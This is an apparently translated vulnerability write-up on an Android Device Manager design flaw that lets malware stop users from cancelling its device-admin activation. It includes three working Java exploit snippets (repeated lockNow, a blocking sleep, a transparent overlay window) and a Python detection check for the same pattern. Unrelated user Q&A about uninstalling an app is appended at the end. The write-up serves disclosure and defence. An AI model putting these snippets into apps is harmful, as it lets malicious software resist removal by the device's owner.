Android Device Manager Vulnerability 2: Preventing Users from Canceling Activation of the Device Manager


In June 2013, the Russian security vendor Kaspersky discovered the most powerful mobile Trojan in history, Obad.a. This Trojan exploits a previously unknown Android Device Manager vulnerability (ANDROID-9067882). A mobile Trojan that has been granted Device Manager permission can exploit this vulnerability to hide itself from the Device Manager list in the Settings application. The user then cannot revoke the Trojan's Device Manager permission through the normal channel, so the Trojan cannot be removed. Android and later versions have fixed this vulnerability. (Vulnerability details: http://blog.csdn.net/androidsecurity/article/details/9124747)


A few days ago, Baidu Security Lab found that mobile Trojans had begun to exploit another Android Device Manager vulnerability. The new vulnerability is caused by a design defect in the Android system's process for canceling activation of the Device Manager. By abusing this defect, malware can prevent users from canceling its Device Manager activation and thereby resist uninstallation. This vulnerability exists in all Android versions.


I. Source code analysis of canceling Device Manager activation


The source code of the process for canceling activation of the Device Manager for Android:


 

 

Basic flowchart for canceling activation of the Device Manager for Android:


 


1. The ActivityManagerNative.getDefault().stopAppSwitches() method


Why is this method called in the first step? The source code comment shows that its purpose is to prevent other programs from popping up a Dialog while the user is canceling the Device Manager activation, which would interfere with the user's operation.


The source code of stopAppSwitches:


 


The code shows that this method works as follows:

Activity switching is prohibited for APP_SWITCH_DELAY_TIME. After this method is called, all Activity launch requests from applications are placed in the system's pending request queue. The system executes the pending Activity launch requests only after APP_SWITCH_DELAY_TIME has elapsed.

 

By calling the stopAppSwitches() method, the system ensures that no Activity switching is performed within five seconds of the Device Manager cancellation.

 

II. Vulnerability principle analysis


From the process above, we found that before the Device Manager calls DevicePolicyManagerService.removeActiveAdmin() to cancel the activation, DevicePolicyManagerService calls the application's onDisableRequested method to obtain the warning message for canceling the activation. If onDisableRequested returns null, step 1 is executed automatically. If onDisableRequested returns non-null content, a warning Dialog is displayed with that message, prompting the user about canceling the activation. The user can click OK to perform step 2.


How can we prevent the process from reaching step 1?

onDisableRequested is the only function called before step 1 of the process. To prevent the process from reaching step 1, the onDisableRequested function must meet the following conditions:

1. Its return value must not be null, so that the Device Manager displays the warning Dialog for canceling activation.

2. The warning Dialog displayed by the Device Manager must be made to disappear through Activity switching, so that the user cannot operate the Dialog.

If both conditions are met, the program can successfully prevent the user from canceling the Device Manager activation.

 

III. Vulnerability exploitation methods


The following three methods can be used to prevent the user from canceling the Device Manager activation.


1. Screen lock

    @Override
    public CharSequence onDisableRequested(Context context, Intent intent) {
        // TODO Auto-generated method stub
        Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
        intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent1);
        final DevicePolicyManager dpm = (DevicePolicyManager) context.getSystemService(Context.DEVICE_POLICY_SERVICE);
        dpm.lockNow();
        new Thread(new Runnable() {
            @Override
            public void run() {
                int i = 0;
                while (i < 70) {
                    dpm.lockNow();
                    try {
                        Thread.sleep(100);
                        i++;
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                }
            }
        }).start();
        return "This is a onDisableRequested response message";
    }

 

2. Blocking function return

 

    @Override
    public CharSequence onDisableRequested(Context context, Intent intent) {
        // TODO Auto-generated method stub
        Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
        intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent1);
        try {
            Thread.sleep(7000);
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
        return "This is a onDisableRequested response message";
    }


3. Transparent window hijacking

    @Override
    public CharSequence onDisableRequested(Context context, Intent intent) {
        // TODO Auto-generated method stub
        Intent intent1 = context.getPackageManager().getLaunchIntentForPackage("com.android.settings");
        intent1.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
        context.startActivity(intent1);
        WindowManager.LayoutParams wmParams;
        final WindowManager mWindowManager;
        wmParams = new WindowManager.LayoutParams();
        mWindowManager = (WindowManager) context.getSystemService(Context.WINDOW_SERVICE);
        wmParams.type = WindowManager.LayoutParams.TYPE_SYSTEM_ALERT;
        wmParams.format = PixelFormat.RGBX_8888;
        wmParams.flags = WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE;
        wmParams.gravity = Gravity.LEFT | Gravity.TOP;
        wmParams.alpha = 0;
        wmParams.x = 0;
        wmParams.y = 0;
        wmParams.width = WindowManager.LayoutParams.MATCH_PARENT;
        wmParams.height = WindowManager.LayoutParams.MATCH_PARENT;
        final View contentView = new Button(context);
        mWindowManager.addView(contentView, wmParams);
        new Thread(new Runnable() {
            @Override
            public void run() {
                try {
                    Thread.sleep(7000);
                } catch (InterruptedException e) {
                    // TODO Auto-generated catch block
                    e.printStackTrace();
                }
                mWindowManager.removeView(contentView);
            }
        }).start();
        return "This is a onDisableRequested response message";
    }

All of the methods above run inside onDisableRequested and use different means to make the user unable to operate the interface for 5 seconds, because the Activity switching request is executed by the system only after those 5 seconds.
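The three methods share one trait that a reviewer can check for: onDisableRequested does more than return warning text. The following static triage check for that pattern is an added example, not code from the original article; the rule list, the function names and the two constructed Java samples are assumptions of this example, and comments in the scanned source are not stripped.

```python
import re

# onDisableRequested() should only return warning text. These calls inside it
# match the techniques described above (labels are this example's own wording).
SUSPICIOUS = [
    (r"\bstartActivity\s*\(", "starts an Activity from the callback"),
    (r"\blockNow\s*\(", "locks the screen from the callback"),
    (r"\bThread\s*\.\s*sleep\s*\(", "blocks or delays with Thread.sleep"),
    (r"\baddView\s*\(", "adds a window via WindowManager.addView"),
    (r"\bTYPE_SYSTEM_ALERT\b", "uses a system alert overlay window"),
]

def method_body(source, name="onDisableRequested"):
    """Return the brace-balanced body of the first method called `name`, or None."""
    m = re.search(r"\b%s\s*\([^)]*\)\s*\{" % re.escape(name), source)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(source) and depth:
        ch = source[i]
        if ch == '"':  # skip string literals so braces inside them are ignored
            i += 1
            while i < len(source) and source[i] != '"':
                i += 2 if source[i] == "\\" else 1
        elif ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
        i += 1
    return source[m.end():i - 1] if depth == 0 else None

def audit(source):
    """List the reasons a receiver's onDisableRequested() looks like anti-uninstall code."""
    body = method_body(source)
    if body is None:
        return []
    return [why for pattern, why in SUSPICIOUS if re.search(pattern, body)]

# Constructed samples (decompiled-style Java), not taken from real applications.
BENIGN = '''class PolicyReceiver extends DeviceAdminReceiver {
    public CharSequence onDisableRequested(Context c, Intent i) {
        return "Disabling removes {remote wipe} protection."; }
    void helper(Context c) { c.startActivity(new Intent()); } }'''
BLOCKING = '''class Receiver extends DeviceAdminReceiver {
    public CharSequence onDisableRequested(Context context, Intent intent) {
        context.startActivity(settingsIntent);
        try { Thread.sleep(7000); } catch (InterruptedException e) { }
        return "warning text"; } }'''
```

Only the callback body is scanned, so the `startActivity` call in the benign sample's `helper` method is not reported.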


The mobile phone shows that the software can be uninstalled only after being deactivated in the Device Manager.

Settings - Security - Device Manager, and remove the software you want to uninstall. This will cancel the activation and you can uninstall it.
 
I want to uninstall the Mobile Phone Manager System settings-security-Device Manager Cancel activation of my mobile phone I5508 Samsung, I do not know where to find device management

Directly set application management, find the Mobile Phone Manager, and uninstall it.
I used i5508
 
